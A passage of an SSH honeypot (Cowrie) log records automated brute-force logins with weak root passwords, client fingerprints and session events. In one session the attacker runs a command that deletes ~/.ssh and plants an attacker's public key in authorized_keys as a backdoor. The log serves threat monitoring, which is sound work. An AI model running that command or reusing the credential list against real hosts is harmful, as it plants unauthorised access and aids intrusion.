03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:08:51.540621Z","src_ip":"212.227.235.229","session":"71bbc9c835e2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:08:52.829728Z","src_ip":"212.227.235.229","session":"71bbc9c835e2"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:53.143866Z","src_ip":"212.227.235.229","session":"4fe8e20d8297"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:53.144849Z","src_ip":"212.227.235.229","session":"71bbc9c835e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50820,"dst_ip":"1.2.3.4","dst_port":22,"session":"db188bdc8dde","protocol":"ssh","message":"New connection: 212.227.125.160:50820 (1.2.3.4:22) [session: db188bdc8dde]","sensor":"my-vps","timestamp":"2025-09-08T22:08:57.564804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T22:08:57.565700Z","src_ip":"212.227.125.160","session":"db188bdc8dde"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T22:08:57.620566Z","src_ip":"212.227.125.160","session":"db188bdc8dde"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60916,"dst_ip":"1.2.3.4","dst_port":22,"session":"59fec3f96bed","protocol":"ssh","message":"New connection: 212.227.235.229:60916 (1.2.3.4:22) [session: 59fec3f96bed]","sensor":"my-vps","timestamp":"2025-09-08T22:08:57.738148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:08:57.764637Z","src_ip":"212.227.235.229","session":"59fec3f96bed"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:57.885565Z","src_ip":"212.227.125.160","session":"db188bdc8dde"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:08:58.177205Z","src_ip":"212.227.235.229","session":"59fec3f96bed"}
{"eventid":"cowrie.login.failed","username":"db1inst1","password":"123","message":"login attempt [db1inst1/123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:08:59.021308Z","src_ip":"212.227.235.229","session":"59fec3f96bed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":1622,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b237183746c","protocol":"ssh","message":"New connection: 212.227.235.229:1622 (1.2.3.4:22) [session: 9b237183746c]","sensor":"my-vps","timestamp":"2025-09-08T22:08:59.680857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Renci.SshNet.SshClient.0.0.1","message":"Remote SSH version: SSH-2.0-Renci.SshNet.SshClient.0.0.1","sensor":"my-vps","timestamp":"2025-09-08T22:08:59.681742Z","src_ip":"212.227.235.229","session":"9b237183746c"}
{"eventid":"cowrie.client.kex","hassh":"748f8c627d3f8ff9921d02f86f55ba2c","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc,blowfish-cbc,twofish-cbc,twofish192-cbc,twofish128-cbc,twofish256-cbc,arcfour,arcfour128,arcfour256,cast128-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha2-512-96,hmac-sha2-256-96,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-md5-96-etm@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc","3des-cbc","blowfish-cbc","twofish-cbc","twofish192-cbc","twofish128-cbc","twofish256-cbc","arcfour","arcfour128","arcfour256","cast128-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha2-512-96","hmac-sha2-256-96","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-md5-96-etm@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 748f8c627d3f8ff9921d02f86f55ba2c","sensor":"my-vps","timestamp":"2025-09-08T22:09:00.198818Z","src_ip":"212.227.235.229","session":"9b237183746c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:00.225989Z","src_ip":"212.227.235.229","session":"59fec3f96bed"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:09:01.756364Z","src_ip":"212.227.235.229","session":"9b237183746c"}
{"eventid":"cowrie.client.size","width":80,"height":60,"message":"Terminal Size: 80 60","sensor":"my-vps","timestamp":"2025-09-08T22:09:02.849628Z","src_ip":"212.227.235.229","session":"9b237183746c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:09:03.368325Z","src_ip":"212.227.235.229","session":"9b237183746c"}
{"eventid":"cowrie.command.input","input":"?","message":"CMD: ?","sensor":"my-vps","timestamp":"2025-09-08T22:09:04.196871Z","src_ip":"212.227.235.229","session":"9b237183746c"}
{"eventid":"cowrie.command.failed","input":"?","message":"Command not found: ?","sensor":"my-vps","timestamp":"2025-09-08T22:09:04.197768Z","src_ip":"212.227.235.229","session":"9b237183746c"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T22:09:04.198519Z","src_ip":"212.227.235.229","session":"9b237183746c"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T22:09:04.199227Z","src_ip":"212.227.235.229","session":"9b237183746c"}
{"eventid":"cowrie.command.input","input":"cd ~","message":"CMD: cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:09:05.254958Z","src_ip":"212.227.235.229","session":"9b237183746c"}
{"eventid":"cowrie.command.input","input":"ls","message":"CMD: ls","sensor":"my-vps","timestamp":"2025-09-08T22:09:06.272062Z","src_ip":"212.227.235.229","session":"9b237183746c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d2ccb2711da31ea9e455532d3527397ef3ae3ca0a8ee4aebd88de5ca556b3047","size":593,"shasum":"d2ccb2711da31ea9e455532d3527397ef3ae3ca0a8ee4aebd88de5ca556b3047","duplicate":false,"duration":"3.9","message":"Closing TTY Log: var/lib/cowrie/tty/d2ccb2711da31ea9e455532d3527397ef3ae3ca0a8ee4aebd88de5ca556b3047 after 3.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:07.294443Z","src_ip":"212.227.235.229","session":"9b237183746c"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:07.295391Z","src_ip":"212.227.235.229","session":"9b237183746c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49524,"dst_ip":"1.2.3.4","dst_port":22,"session":"394e15b6fda6","protocol":"ssh","message":"New connection: 212.227.235.229:49524 (1.2.3.4:22) [session: 394e15b6fda6]","sensor":"my-vps","timestamp":"2025-09-08T22:09:09.689691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:09:09.691361Z","src_ip":"212.227.235.229","session":"394e15b6fda6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:09:09.981890Z","src_ip":"212.227.235.229","session":"394e15b6fda6"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"!","message":"login attempt [esuser/!] failed","sensor":"my-vps","timestamp":"2025-09-08T22:09:11.147574Z","src_ip":"212.227.235.229","session":"394e15b6fda6"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:12.441366Z","src_ip":"212.227.235.229","session":"394e15b6fda6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56524,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff478ff6c309","protocol":"ssh","message":"New connection: 212.227.235.229:56524 (1.2.3.4:22) [session: ff478ff6c309]","sensor":"my-vps","timestamp":"2025-09-08T22:09:13.250543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:09:13.251139Z","src_ip":"212.227.235.229","session":"ff478ff6c309"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:09:13.564013Z","src_ip":"212.227.235.229","session":"ff478ff6c309"}
{"eventid":"cowrie.login.failed","username":"matrix","password":"matrix","message":"login attempt [matrix/matrix] failed","sensor":"my-vps","timestamp":"2025-09-08T22:09:14.855900Z","src_ip":"212.227.235.229","session":"ff478ff6c309"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:16.172352Z","src_ip":"212.227.235.229","session":"ff478ff6c309"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35778,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c51995fe12c","protocol":"ssh","message":"New connection: 212.227.235.229:35778 (1.2.3.4:22) [session: 6c51995fe12c]","sensor":"my-vps","timestamp":"2025-09-08T22:09:19.401995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:09:19.402947Z","src_ip":"212.227.235.229","session":"6c51995fe12c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:09:19.651496Z","src_ip":"212.227.235.229","session":"6c51995fe12c"}
{"eventid":"cowrie.login.success","username":"root","password":"hosting","message":"login attempt [root/hosting] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:09:20.688283Z","src_ip":"212.227.235.229","session":"6c51995fe12c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:09:21.894415Z","src_ip":"212.227.235.229","session":"6c51995fe12c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:09:21.895260Z","src_ip":"212.227.235.229","session":"6c51995fe12c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:09:21.896310Z","src_ip":"212.227.235.229","session":"6c51995fe12c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:22.903698Z","src_ip":"212.227.235.229","session":"6c51995fe12c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:09:23.228277Z","src_ip":"212.227.235.229","session":"6c51995fe12c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:09:23.228987Z","src_ip":"212.227.235.229","session":"6c51995fe12c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51376,"dst_ip":"1.2.3.4","dst_port":22,"session":"184d3e7dd20d","protocol":"ssh","message":"New connection: 212.227.235.229:51376 (1.2.3.4:22) [session: 184d3e7dd20d]","sensor":"my-vps","timestamp":"2025-09-08T22:09:23.231739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:09:23.232282Z","src_ip":"212.227.235.229","session":"184d3e7dd20d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:09:23.479307Z","src_ip":"212.227.235.229","session":"184d3e7dd20d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:09:23.480879Z","src_ip":"212.227.235.229","session":"6c51995fe12c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:23.482378Z","src_ip":"212.227.235.229","session":"6c51995fe12c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40938,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a04edc4a2fb","protocol":"ssh","message":"New connection: 212.227.235.229:40938 (1.2.3.4:22) [session: 7a04edc4a2fb]","sensor":"my-vps","timestamp":"2025-09-08T22:09:23.731733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:09:23.732774Z","src_ip":"212.227.235.229","session":"7a04edc4a2fb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:09:23.985217Z","src_ip":"212.227.235.229","session":"7a04edc4a2fb"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty12!","message":"login attempt [root/Qwerty12!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:09:24.511905Z","src_ip":"212.227.235.229","session":"184d3e7dd20d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:09:25.025246Z","src_ip":"212.227.235.229","session":"184d3e7dd20d"}
